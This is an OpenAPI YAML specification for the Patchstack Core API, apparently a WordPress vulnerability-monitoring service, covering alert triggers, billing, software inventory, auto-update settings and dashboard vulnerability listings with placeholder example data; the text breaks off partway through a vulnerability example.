openapi: 3.0.0
info:
  title: 'Patchstack Core API'
  description: 'This is the initial version of the Patchstack core API documentation.<br><br>It is important to pass the API token in the "UserToken" HTTP header.<br>The UserToken API key can be found here [https://app.patchstack.com/settings/integrations](https://app.patchstack.com/settings/integrations)'
  version: 1.0.0
servers:
  -
    url: 'https://api.patchstack.com/monitor'
    description: 'Patchstack App API'
paths:
  /alerts/latest:
    post:
      tags:
        - Alert
      summary: 'Latest triggered rules'
      description: 'Get the latest triggered rules.'
      operationId: 4a8e2a7ee5c27ba53844e6012b1fba91
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { alerts: { description: Alerts, type: array, items: { properties: { id: { description: 'The alert trigger unique identifier.', type: integer, example: 1 }, siteid: { description: 'The site identifier on which the alert rule got triggered.', type: integer, example: 1 }, url: { description: 'Site URL.', type: string, example: 'https://test.com' }, date: { description: 'Date of trigger.', type: string, example: '2024-01-09T09:17:42.000000Z' }, data: { description: 'Array of information related to the alert.', type: array, items: { properties: { sw_key: { description: 'Software key identifier.', type: string, example: wp-rocket/wp-rocket.php }, sw_name: { description: 'Software name.', type: string, example: 'WP Rocket' }, sw_type: { description: 'Software type.', type: string, example: plugin }, sw_active: { description: 'Software active state.', type: integer, example: 1 }, sw_cur_ver: { description: 'Software current version.', type: string, example: 3.15.6 }, sw_new_ver: { description: 'Software new version.', type: string, example: 3.15.7 }, sw_key_title: { description: 'Software slug.', type: string, example: wp-rocket } }, type: object } }, trigger: { description: 'The trigger related to the alert.', type: array, items: { properties: { id: { description: 'The identifier of the trigger.', type: integer, example: 1 }, userid: { description: 'The id of the user that owns this trigger.', type: integer, example: 1 }, title: { description: 'Title of trigger.', type: string, example: 'Vulnerable Software Alert' }, type: { $ref: '#/components/schemas/alert_trigger_type' }, trigger: { $ref: '#/components/schemas/alert_trigger_condition' }, action: { $ref: '#/components/schemas/alert_trigger_action' }, active: { description: 'Active state of the trigger.', type: boolean, example: true }, created_at: { description: 'Created at timestamp.', type: string, example: '2023-12-15 07:46:16' }, updated_at: { description: 'Updated at timestamp.', type: string, example: '2023-12-15 07:46:16' } }, type: object } }, counters: { description: 'Counters of alerts.', type: array, items: { properties: { total: { description: 'Total alerts.', type: integer, example: 1 }, software: { description: 'Software related alerts.', type: integer, example: 1 }, activity: { description: 'Activity related alerts.', type: integer, example: 0 } }, type: object } } }, type: object } } }
                  type: object
              example:
                alerts:
                  '0': { id: 1, siteid: 1, url: 'https://test.com', date: '2024-01-09T09:17:42.000000Z', data: { sw_key: wp-rocket/wp-rocket.php, sw_name: 'WP Rocket', sw_type: plugin, sw_active: 1, sw_cur_ver: 3.15.6, sw_new_ver: 3.15.7, sw_key_title: wp-rocket }, trigger: { id: 1, userid: 1, title: 'Vulnerable Software Alert', type: software, trigger: { value: null, attribute: vulnerable, comparison: null }, action: { alert: 'email notification', target: test@test.com }, active: 1, created_at: '2023-12-15 07:46:16', updated_at: '2023-12-15 07:46:16' } }
                  counters: { total: 1, software: 1, activity: 0 }
  /alerts/triggers:
    get:
      tags:
        - Alert
      summary: 'Get user triggers'
      description: 'Get all the triggers of the user.'
      operationId: abbff733a60f0103723117c700f1b2b8
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { triggers: { description: Triggers, type: array, items: { properties: { id: { description: 'The identifier of the trigger.', type: integer, example: 1 }, userid: { description: 'The id of the user that owns this trigger.', type: integer, example: 1 }, title: { description: 'Title of trigger.', type: string, example: 'Vulnerable Software Alert' }, type: { $ref: '#/components/schemas/alert_trigger_type' }, trigger: { $ref: '#/components/schemas/alert_trigger_condition' }, action: { $ref: '#/components/schemas/alert_trigger_action' }, active: { description: 'Active state of the trigger.', type: boolean, example: true }, created_at: { description: 'Created at timestamp.', type: string, example: '2023-12-15 07:46:16' }, updated_at: { description: 'Updated at timestamp.', type: string, example: '2023-12-15 07:46:16' } }, type: object } } }
                  type: object
              example:
                triggers:
                  - { id: 1, userid: 1, title: 'Vulnerable Software Alert', type: software, trigger: { value: null, attribute: vulnerable, comparison: null }, action: { alert: 'email notification', target: test@test.com }, active: 1, created_at: '2023-12-15 07:46:16', updated_at: '2023-12-15 07:46:16' }
  /alerts/create:
    post:
      tags:
        - Alert
      summary: 'Create trigger'
      description: 'Create a new trigger.'
      operationId: 686e3fff6128afcd6790bb5207006208
      requestBody:
        required: true
        content:
          application/json:
            schema:
              properties:
                title:
                  description: 'The title of the alert.'
                  type: string
                  example: 'Vulnerable Software Alert'
                alert:
                  description: 'The email address to alert.'
                  type: string
                  example: test@test.com
                alerttype:
                  $ref: '#/components/schemas/alert_trigger_alert_type'
                patch_priority:
                  description: 'If subtype is vulnerable, dictates if should exclude low priority vulnerabilities.'
                  type: boolean
                  example: false
                type:
                  $ref: '#/components/schemas/alert_trigger_type'
                subtype:
                  $ref: '#/components/schemas/alert_trigger_subtype'
                value:
                  $ref: '#/components/schemas/alert_trigger_value'
                valuetype:
                  $ref: '#/components/schemas/alert_trigger_valuetype'
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The alert trigger has been created.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The trigger could not be created.'
  '/alerts/delete/{trigger}':
    delete:
      tags:
        - Alert
      summary: 'Delete trigger'
      description: 'Delete a trigger.'
      operationId: 02b142d65540ce946957c6bd349c77a7
      parameters:
        -
          name: trigger
          in: path
          description: 'The unique identifier of the trigger.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The alert trigger has been deleted.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The alert trigger could not be deleted.'
  '/alerts/view/{trigger}':
    get:
      tags:
        - Alert
      summary: 'View trigger'
      description: 'View a specific trigger.'
      operationId: 30e966989339ef05cd390c8214a672ab
      parameters:
        -
          name: trigger
          in: path
          description: 'Unique identifier of the trigger.'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { trigger: { description: Trigger, type: array, items: { properties: { id: { description: 'Unique identifier of the trigger.', type: integer, example: 1 }, userid: { description: 'Unique identifier of the user that owns this trigger.', type: integer, example: 1 }, title: { description: 'The title of the trigger.', type: string, example: 'Vulnerable Software Alert' }, type: { $ref: '#/components/schemas/alert_trigger_type' }, trigger: { $ref: '#/components/schemas/alert_trigger_condition' }, action: { $ref: '#/components/schemas/alert_trigger_action' }, active: { description: 'Active state.', type: boolean, example: true }, created_at: { description: 'Created at.', type: string, example: '2023-12-15 07:46:16' }, updated_at: { description: 'Updated at.', type: string, example: '2023-12-15 07:46:16' } }, type: object } } }
                  type: object
              example:
                trigger:
                  - { id: 1, userid: 1, title: 'Vulnerable Software Alert', type: software, trigger: { value: null, attribute: vulnerable, comparison: null }, action: { alert: 'email notification', target: test@test.com }, active: 1, created_at: '2023-12-15 07:46:16', updated_at: '2023-12-15 07:46:16' }
  '/alerts/update/{trigger}':
    post:
      tags:
        - Alert
      summary: 'Update trigger'
      description: 'Update a specific trigger.'
      operationId: 61ba97fd2ad452394137faf78fc9f15a
      parameters:
        -
          name: trigger
          in: path
          description: 'The unique identifier of the trigger.'
          required: true
          example: '1'
      requestBody:
        required: false
        content:
          application/json:
            schema:
              properties:
                title:
                  description: 'The title of the alert.'
                  type: string
                  example: 'Vulnerable Software Alert'
                alert:
                  description: 'The email address to alert.'
                  type: string
                  example: test@test.com
                alerttype:
                  $ref: '#/components/schemas/alert_trigger_alert_type'
                patch_priority:
                  description: 'If subtype is vulnerable, dictates if should exclude low priority vulnerabilities.'
                  type: boolean
                  example: false
                type:
                  $ref: '#/components/schemas/alert_trigger_type'
                subtype:
                  $ref: '#/components/schemas/alert_trigger_subtype'
                value:
                  $ref: '#/components/schemas/alert_trigger_value'
                valuetype:
                  $ref: '#/components/schemas/alert_trigger_valuetype'
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The trigger has been updated.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The alert trigger could not be updated.'
  '/billing/view/{id}':
    get:
      tags:
        - Billing
      summary: 'Download invoice PDF'
      description: 'Download an invoice as a PDF.'
      operationId: f98286f73838e0f0953eb0bc4c18c812
      parameters:
        -
          name: id
          in: path
          description: 'Invoice identifier, including country prefix.'
          example: DE-1234
      responses:
        '200':
          description: 'File retrieved, served as application/pdf.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'Invalid invoice.'
  /billing/invoices:
    post:
      tags:
        - Billing
      summary: 'List invoices'
      description: 'Compose a list of all invoices that belong to the current authenticated user.'
      operationId: c6314823a95668ac56a885aa84f68b12
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { invoices: { description: Invoices, type: array, items: { properties: { id: { description: 'Unique identifier of the invoice.', type: string, example: DE-1234 }, status: { description: 'Status of the invoice.', type: string, enum: [open, pending, past_due, paid, failed], example: paid }, creation: { description: 'Creation date.', type: string, example: 'April 04, 2024' }, amount_inc: { description: 'Amount, incl. taxes.', type: string, example: '7,000.00' } }, type: object } }, total: { description: 'Total number of invoices.', type: integer, example: 1 } }
                  type: object
              example:
                invoices:
                  - { id: 2579, status: paid, creation: 'April 04, 2024', amount_inc: '7,000.00' }
                  - { id: DE-2580, status: open, creation: 'April 04, 2024', amount_inc: '3,000.00' }
                  - { id: 2581, status: paid, creation: 'April 04, 2024', amount_inc: '2,000.00' }
                  - { id: 2582, status: pending, creation: 'April 04, 2024', amount_inc: '1,000.00' }
                total: 4
  /billing/info:
    get:
      tags:
        - Billing
      summary: 'Get billing information'
      description: 'Get the billing information of the user from Recurly.'
      operationId: 98c3430d50714a51ebdc44df856fb2a7
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { postal_code: { description: 'Postal code', type: string, example: '12345' }, payment: { description: Payment, type: array, items: { properties: { type: { description: Type, type: string, example: credit_card }, card: { description: Card, type: string, example: 'American Express' }, last_four: { description: last_four, type: sting, example: '0005' } }, type: object } }, first_name: { description: 'First name', type: string, example: James }, last_name: { description: 'Last name', type: string, example: Bond }, company: { description: Company, type: string, example: null }, address1: { description: 'Address 1', type: string, example: 'My street 5' }, address2: { description: 'Address 2', type: string, example: null }, city: { description: City, type: string, example: Cityville }, state: { description: State, type: string, example: California }, country: { description: Country, type: string, example: USA }, cost: { description: 'Current subscription cost.', type: integer, example: 0 }, pending_cost: { description: 'Pending cost, if subscription were to change.', type: integer, example: 0 }, has_pending: { description: 'If the user has a pending subscription change.', type: boolean, example: false }, status: { description: Status, type: sting, enum: [active, canceled, expired, failed, future, paused], example: active }, renew: { description: 'Renewal date.', type: sting, example: '22 November 2024' }, addons: { description: Addons, type: array, items: { properties: { api: { description: 'Vulnerability database API cost in cents.', type: integer, example: 14900 }, volume: { description: 'Volume upgrade cost in cents.', type: integer, example: 9900 } }, type: object } }, balance: { description: 'Credit balance on the account.', type: sting, example: '13,00' }, upcoming: { description: 'Upcoming invoice cost, if any.', type: array, items: { properties: { balance: { description: 'The total cost of the invoice in cents.', type: integer, example: 0 }, discount: { description: 'Discount applied to the invoice in cents.', type: integer, example: 0 } }, type: object } } }
                  type: object
              example:
                postal_code: '12345'
                payment:
                  type: credit_card
                  card: 'American Express'
                  last_four: '0005'
                first_name: James
                last_name: Bond
                company: null
                address1: 'Street 45'
                address2: null
                city: Cityville
                state: California
                country: USA
                vat_number: null
                cost: 0
                pending_cost: 0
                has_pending: false
                status: active
                renew: '22 November 2024'
                addons:
                  api: 14900
                  volume: 9900
                balance: '13,00'
                upcoming:
                  balance: 0
                  discount: 0
  /billing/remove:
    delete:
      tags:
        - Billing
      summary: 'Remove billing info'
      description: 'Remove billing info from the account.'
      operationId: 97f8512056a3fb8ee683d15eb0f3dea7
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The billing information has been removed.'
  /billing/total:
    post:
      tags:
        - Billing
      summary: 'Get billing cost'
      description: 'Get the total cost given the plan details.'
      operationId: c670be34ccb89a826f7406aa2c4318fc
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - frequency
                - plan
              properties:
                frequency:
                  description: Frequency
                  type: string
                  default: monthly
                  enum: [monthly, annually]
                plan:
                  description: Plan
                  type: string
                  default: pro
                  enum: [community, pro, business]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { total: { description: 'Total cost.', type: string, example: '7000.00' }, savings: { description: Savings, type: string, example: '7.00' } }
                  type: object
              example:
                total: '7000.00'
                savings: '7.00'
  '/billing/payment/protection/{site}':
    post:
      tags:
        - Billing
      summary: 'Activate community protection'
      description: 'Process the activation of the protection module for a community user.'
      operationId: d57dcafef94b9ee61d6429de754fb719
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        required: false
        content:
          application/json:
            schema:
              properties:
                modules:
                  type: array
                  items: { type: int }
                  example: [383, 381, 178, 1]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'Protection for this site has been enabled.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You are not a community user or your subscription has been cancelled.'
  '/billing/payment/protection/{site}/deactivate':
    post:
      tags:
        - Billing
      summary: 'Deactivate community protection'
      description: 'Process the deactivation of the protection module for a community user.'
      operationId: bbdc7aec8dad6cfae8a8f3e811b3ef23
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'Protection for this site has been deactivated.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'You are not a community user or your subscription has been cancelled.'
  /billing/coupons:
    get:
      tags:
        - Billing
      summary: 'Get active coupons'
      description: 'Get all active coupons of the user.'
      operationId: 42f2eb3c0fb29d2c9b95daf895a174f0
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { coupon: { description: Coupon, type: array, items: { properties: { name: { description: Name, type: string, example: coupon-tab-6mo }, discount_type: { description: 'Discount type', type: string, enum: [fixed, percent], example: percent }, discount_percent: { description: 'Discount percent', type: integer, example: 50 }, duration_type: { description: 'Duration type', type: string, enum: [day, week, month, year], example: month }, duration_length: { description: 'Duration length, multiplies by duration_type.', type: integer, example: 6 }, plan_codes: { description: 'Plan codes to which the coupon can be applied.', type: string, example: [pro-monthly, pro-annually] }, free_trial_unit: { description: 'Free trial unit amount.', type: string, enum: [day, month, week, ''], example: '' }, free_trial_amount: { description: 'Free trial duration length, multiplies by free_trial_unit.', type: integer, example: 0 }, item_codes: { description: 'Item codes to which the discount applies, if any.', type: string, example: [protected-sites] }, applies_to_all_plans: { description: 'Whether or not the discount applies to all plans.', type: boolean, example: false } }, type: object } } }
                  type: object
              example:
                coupon:
                  name: bf2024-tab-6mo
                  discount_type: percent
                  discount_percent: 50
                  discount_in_cents: null
                  duration_type: temporal
                  duration_length: month
                  plan_codes: [pro-monthly]
                  free_trial_unit: ''
                  free_trial_amount: 0
                  item_codes: []
                  applies_to_all_plans: false
  /billing/coupon:
    post:
      tags:
        - Billing
      summary: 'Get coupon info'
      description: 'Check the state of a coupon and get its information.'
      operationId: 47770313240d1075154d862882b77150
      requestBody:
        required: true
        content:
          application/json:
            schema:
              properties:
                coupon:
                  type: string
                  example: bf2024-tab-6mo
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { coupon: { description: Coupon, type: array, items: { properties: { name: { description: Name, type: string, example: coupon-tab-6mo }, discount_type: { description: 'Discount type', type: string, enum: [fixed, percent], example: percent }, discount_percent: { description: 'Discount percent', type: integer, example: 50 }, duration_type: { description: 'Duration type', type: string, enum: [day, week, month, year], example: month }, duration_length: { description: 'Duration length, multiplies by duration_type.', type: integer, example: 6 }, plan_codes: { description: 'Plan codes to which the coupon can be applied.', type: string, example: [pro-monthly, pro-annually] }, free_trial_unit: { description: 'Free trial unit amount.', type: string, enum: [day, month, week, ''], example: '' }, free_trial_amount: { description: 'Free trial duration length, multiplies by free_trial_unit.', type: integer, example: 0 }, item_codes: { description: 'Item codes to which the discount applies, if any.', type: string, example: [protected-sites] }, applies_to_all_plans: { description: 'Whether or not the discount applies to all plans.', type: boolean, example: false } }, type: object } } }
                  type: object
              example:
                coupon:
                  name: bf2024-tab-6mo
                  discount_type: percent
                  discount_percent: 50
                  discount_in_cents: null
                  duration_type: temporal
                  duration_length: month
                  plan_codes: { success: 'Protection for this site has been deactivated.' }
                  free_trial_unit: ''
                  free_trial_amount: 0
                  item_codes: []
                  applies_to_all_plans: false
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'The coupon code does not exist or has expired.'
  /billing/cancel:
    delete:
      tags:
        - Billing
      summary: 'Cancel subscription'
      description: 'Cancel the subscription at Recurly.'
      operationId: 45ee03f595aa01aa54f42bbfa2c69796
      requestBody:
        required: true
        content:
          application/json:
            schema:
              properties:
                feedback:
                  description: 'My feedback string.'
                  type: string
                  example: feedback
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'The subscription has been cancelled.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'An error occurred.'
  /component/overview:
    get:
      tags:
        - Software
      summary: 'Get all software'
      description: 'Fetch all software information of all sites of the user.'
      operationId: 6d5e25a69361b809cb3f2a75ec477be9
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - page
                - perPage
                - search
                - search_type
              properties:
                page:
                  description: 'Current paginated page.'
                  type: integer
                  example: 1
                perPage:
                  description: 'Number of entries per page.'
                  type: integer
                  example: 2
                search:
                  description: 'String to search for.'
                  type: string
                  example: ''
                search_type:
                  description: 'Search type to execute, for Application, this must be the site URL.'
                  type: string
                  enum: ['', Application, 'Software Name', 'Software Slug']
                  example: 'Software Name'
                cms_id:
                  $ref: '#/components/schemas/cms_id'
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { siteInfo: { description: 'List of sites which have data returned in the software array.', type: array, items: { properties: { '1': { description: 'Site URL, of which the key is the site identifier.', type: string, example: 'https://test.com' } }, type: object } }, software: { description: Software, type: array, items: { properties: { site: { description: 'The unique identifier of the site.', type: integer, example: 1 }, canUpdate: { description: 'Whether or not this site can update this software.', type: boolean, example: false }, issue: { description: 'Software entry for this site and if it has a vulnerability.', type: array, items: { properties: { id: { description: 'Identifier of the software entry.', type: integer, example: 1 }, sw_type: { description: 'Software type', type: string, enum: [php, database, wordpress, core, plugin, theme, extension, module, drupal, joomla], example: php }, sw_name: { description: 'Name of the software.', type: string, example: PHP }, sw_cur_ver: { description: 'Current version, as reported by the site.', type: string, example: 7.4.3 }, sw_new_ver: { description: 'New version available, as reported by the site.', type: string, example: 7.4.3 }, sw_active: { description: 'Active state of the software.', type: boolean, example: true }, isVulnerable: { description: 'Vulnerability status of this software entry.', type: boolean, example: true }, isOutdated: { description: 'Outdated status of this software entry.', type: boolean, example: false }, fixed_in: { description: 'If vulnerable, fixed version of this vulnerability.', type: string, example: null }, affected_in: { description: 'If vulnerable, affected version of this vulnerability.', type: string, example: null }, sw_key: { description: 'Full slug of the software.', type: string, example: null }, sw_key_title: { description: 'Simple slug of the software.', type: string, example: null }, is_exploited: { description: 'If vulnerable, its exploitation status.', type: boolean, example: false }, patch_priority: { description: 'The patch priority score.', type: integer, example: 2 }, credit_name: { description: 'If vulnerable, the name of the researcher who found this.', type: string, example: 'My researcher name' } }, type: object } } }, type: object } }, total: { description: 'Total number of entries returned.', type: integer, example: 2 } }
                  type: object
              example:
                siteInfo:
                  '1': 'https://test.com'
                software:
                  - { site: 1, canUpdate: false, issue: { id: 41369324, sw_type: php, sw_name: PHP, sw_cur_ver: 7.4.3, sw_new_ver: '', sw_active: null, isVulnerable: false, isOutdated: null, fixed_in: null, affected_in: null, sw_key: null, sw_key_title: null, is_exploited: null, patch_priority: null, credit_name: null } }
                  - { site: 1, canUpdate: false, issue: { id: 41369266, sw_type: plugin, sw_name: 'Anderson Pro', sw_cur_ver: 1.2.1, sw_new_ver: 1.2.2, sw_active: 1, isVulnerable: 1, isOutdated: 1, fixed_in: 1.2.2, affected_in: '< 1.2.1', sw_key: anderson/anderson.php, sw_key_title: anderson, is_exploited: 0, patch_priority: 3, credit_name: 'Researcher name' } }
                total: 2
  /component/autoupdates:
    get:
      tags:
        - Software
      summary: 'Get auto-update settings'
      description: 'Get auto-update software status of each site, WordPress only.'
      operationId: 1334e63d09b2584dcd0198b82093560a
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { total: { description: 'Total number of sites.', type: integer, example: 1 }, sites: { description: 'Sites array with their settings.', type: array, items: { properties: { site: { description: 'Unique site identifier.', type: integer, example: 1 }, addon_protection: { description: 'Addon protection status, applies to community plan only.', type: integer, example: 0 }, canUpdate: { description: 'Can update software.', type: boolean, example: true }, webarx: { description: 'The version of the WebARX (legacy) or Patchstack plugin.', type: string, example: 2.2.20 } }, type: object } } }
                  type: object
              example:
                total: 1
                sites:
                  - { site: 1, addon_protection: 0, canUpdate: true, webarx: 2.2.20 }
  '/component/site/{site}':
    get:
      tags:
        - Software
      summary: 'Get site auto-update state'
      description: 'Get the current auto-update state of a site, WordPress only.'
      operationId: 1f1e989abefe1521b2ccf4f2cc24b6e3
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                - vulnerable
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'Failed to retrieve the settings of the site. (NOT_AN_ARRAY)'
    post:
      tags:
        - Software
      summary: 'Save site auto-update state'
      description: 'Save the auto-update state of a site, applies to WordPress only.'
      operationId: b1e93756208821560165f36c0d39febc
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site'
          required: true
          example: '1'
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - vulnerable
                - core
                - plugin
                - theme
              properties:
                vulnerable:
                  description: 'Auto-update vulnerable only.'
                  type: boolean
                  example: true
                core:
                  description: 'Auto-update WP core only.'
                  type: boolean
                  example: false
                plugin:
                  description: 'Auto-update plugins only.'
                  type: boolean
                  example: false
                theme:
                  description: 'Auto-update themes only.'
                  type: boolean
                  example: false
                type:
                  description: 'This should be webarx for Patchstack/WebARX plugin < 2.1.0.'
                  type: string
                  default: patchstack
                  enum: [patchstack, webarx]
                  example: patchstack
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                success: 'Plugin options has been updated.'
        '422':
          description: ''
          content:
            application/json:
              schema: {  }
              example:
                error: 'We could not get a valid response from the website, contact support for further assistance.'
  /dashboard:
    get:
      tags:
        - Dashboard
      summary: 'Get dashboard statistics'
      description: 'Fetch information that is displayed on the dashboard of the portal.'
      operationId: f0215ca27b61aa77b8532b6da02c50a5
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { attacks: { description: 'Attacks blocked per day based on the date parameter.', properties: { num: { description: 'Number of attacks blocked.', type: integer, example: 0 }, dateday: { description: 'Date of the attacks blocked.', type: string, example: '2024-10-19' } }, type: object }, stats: { description: 'Global statistics.', properties: { components_count_sum: { description: 'Number of total software components.', type: integer, example: 1 }, components_vulnerable_sum: { description: 'Number of total vulnerable software components.', type: integer, example: 1 }, components_outdated_sum: { description: 'Number of total outdated software components.', type: integer, example: 1 }, components_disabled_sum: { description: 'Number of total disabled software components.', type: integer, example: 1 }, vulnerable_high_sum: { description: 'Number of total high risk vulnerabilities.', type: integer, example: 1 }, vulnerable_medium_sum: { description: 'Number of total medium risk vulnerabilities.', type: integer, example: 1 }, vulnerable_low_sum: { description: 'Number of total low risk vulnerabilities.', type: integer, example: 1 }, reports_downloaded: { description: 'Number of total reports downloaded.', type: integer, example: 1 }, reports_new: { description: 'Number of total new reports.', type: integer, example: 1 }, reports_schedules: { description: 'Number of total report schedules.', type: integer, example: 1 }, sites_connected: { description: 'Number of total sites with an active connection.', type: integer, example: 1 }, sites_outdated: { description: 'Number of total sites with outdated software.', type: integer, example: 1 }, sites_total: { description: 'Number of total sites.', type: integer, example: 1 }, sites_vulnerable: { description: 'Number of total sites with vulnerabilities.', type: integer, example: 1 } }, type: object } }
                  type: object
              example:
                attacks:
                  - { num: 0, dateday: '2024-10-14' }
                  - { num: 0, dateday: '2024-10-15' }
                  - { num: 0, dateday: '2024-10-16' }
                  - { num: 0, dateday: '2024-10-17' }
                  - { num: 0, dateday: '2024-10-18' }
                  - { num: 0, dateday: '2024-10-19' }
                  - { num: 0, dateday: '2024-10-20' }
                  - { num: 0, dateday: '2024-10-21' }
                  - { num: 0, dateday: '2024-10-22' }
                stats:
                  components_count_sum: 60
                  components_vulnerable_sum: 23
                  components_outdated_sum: 38
                  components_disabled_sum: 16
                  vulnerable_high_sum: 6
                  vulnerable_medium_sum: 16
                  vulnerable_low_sum: 36
                  sites_total: 1
                  sites_outdated: 1
                  sites_vulnerable: 1
                  sites_connected: 0
                  reports_schedules: 1
                  reports_new: 1
                  reports_downloaded: 0
  '/dashboard/vulnerabilities/{site?}':
    post:
      tags:
        - Dashboard
      summary: 'Get vulnerabilities'
      description: 'Fetch vulnerability information that is displayed on the dashboard of the portal.'
      operationId: 8a6e3f514edd9f267812dc853398e716
      parameters:
        -
          name: site
          in: path
          description: 'The unique identifier of the site to find vulnerabilities for, optional parameter.'
          example: 1
      requestBody:
        required: true
        content:
          application/json:
            schema:
              required:
                - cms_id
                - isExploited
                - isFixed
                - isMitigated
                - order
                - page
                - perPage
                - search
                - selectedPriority
                - selectedSeverity
              properties:
                cms_id:
                  $ref: '#/components/schemas/cms_id'
                isExploited:
                  description: 'Filter by exploitation status.'
                  type: boolean
                  example: false
                isFixed:
                  description: 'Filer by vulnerability fixed status'
                  type: boolean
                  example: false
                isMitigated:
                  type: boolean
                  example: false
                  deprecated: true
                order:
                  description: '0 = newest + priority, 1 = oldest + priority, 2 = newest, 3 = oldest'
                  type: integer
                  enum: [0, 1, 2, 3]
                  example: 0
                page:
                  description: 'Current pagination page.'
                  type: integer
                  example: 25
                perPage:
                  description: 'Number of results per page.'
                  type: integer
                  example: 25
                search:
                  description: 'Search by vulnerability title or site URL.'
                  type: string
                  example: ''
                selectedPriority:
                  description: 'Filter by patch priority.'
                  type: array
                  items: { type: string }
                  enum: [High, Medium, Low]
                  example: [High]
                selectedSeverity:
                  description: 'Filter by severity (CVSS score).'
                  type: array
                  items: { type: string }
                  enum: [Critical, High, Medium, Low]
                  example: [Critical]
              type: object
      responses:
        '200':
          description: ''
          content:
            application/json:
              schema:
                type: array
                items:
                  properties: { site: { description: 'Unique identifier of the site.', type: integer, example: 1 }, site_id: { description: 'Unique identifier of the site.', type: integer, example: 1 }, url: { description: 'The URL of the site.', type: string, example: 'https://test.com' }, cms: { description: 'CMS of the site.', type: string, example: WordPress }, addon_protection: { description: 'If class = 0, dictates if paid protection is enabled.', type: boolean, example: false }, slug: { description: 'Vulnerability URL slug.', type: string, example: wordpress-oxygen-plugin-4-8-1-auth-remote-code-execution-rce-vulnerability }, issue: { description: 'Vulnerable software name.', type: string, example: 'Oxygen Builder' }, name: { description: 'Vulnerable software name.', type: string, example: 'Oxygen Builder' }, vuln_type: { description: 'Vulnerability type.', type: string, example: 'Remote Code Execution (RCE)' }, affected_in: { description: 'If vulnerable, affected version of this vulnerability.', type: string, example: null }, fixed_in: { description: 'If vulnerable, fixed version of this vulnerability.', type: string, example: null }, is_exploited: { description: 'If vulnerable, its exploitation status.', type: boolean, example: false }, patch_priority: { description: 'The patch priority score.', type: integer, example: 2 }, credit_name: { description: 'If vulnerable, the name of the researcher who found this.', type: string, example: 'My researcher name' }, vpatch: { description: 'Firewall rule identifier. 0/-1 = non-existent', type: integer, example: 5555 }, disclosure_date: { description: 'Vulnerability disclosure date.', type: string, example: '2024-04-03 09:37:02' }, resolve_date: { description: 'Formatted date of when the vulnerability should be mitigated on the site.', type: string, example: '10 Apr, 2024' }, score: { description: 'CVSS score of vulnerability.', type: decimal, example: 9.9 }, unseen: { description: 'Whether or not this vulnerability was loaded through the App yet.', type: boolean, example: false }, vuln_url: { description: 'Full URL to the vulnerability.', type: string, example: 'https://patchstack.com/database/vulnerability/oxygen/wordpress-oxygen-plugin-4-8-1-auth-remote-code-execution-rce-vulnerability' } }
                  type: object
              example:
                -
                  site: 12345
                  site_id: 12345
                  url: 'https://wptest.com'
                  cms: WordPress
                  addon_protection: 0
                  slug: wordpress-oxygen-plugin-4-8-1-auth-remote-code-execution-rce-vulnerability
                  issue: 'Oxygen Builder'
                  name: 'Oxygen Builder'
                  vuln_type: 'Remote Code Execution (RCE)'
                  affected_in: '<= 4.8.3'
                  fixed_in: ''
                  is_exploited: 0
                  patch_priority: 2
                  credit_name: Snicco
                  vpatch: 9063
                  disclosure_date: '2024-04-03 09:37:02'
                  resolve_date: '10 Apr, 2024'
                  score: 9.9
                  unseen: false
                  vuln_url: 'https://patchstack.com/database/vulnerability/oxygen/wordpress-oxygen-plugin-4-8-1-auth-remote-code-execution-rce-vulnerability'
                -
                  site: 12345
                  site_id: 12345
                  url: 'https://wptest.com'
                  cms: WordPress
                  addon_protection: 0
                  slug: wordpress-svg-support-plugin-2-5-5-authenticated-author-cross-site-scripting-via-svg-vulnerability
                  issue: 'SVG Support'
                  name: 'SVG Support'
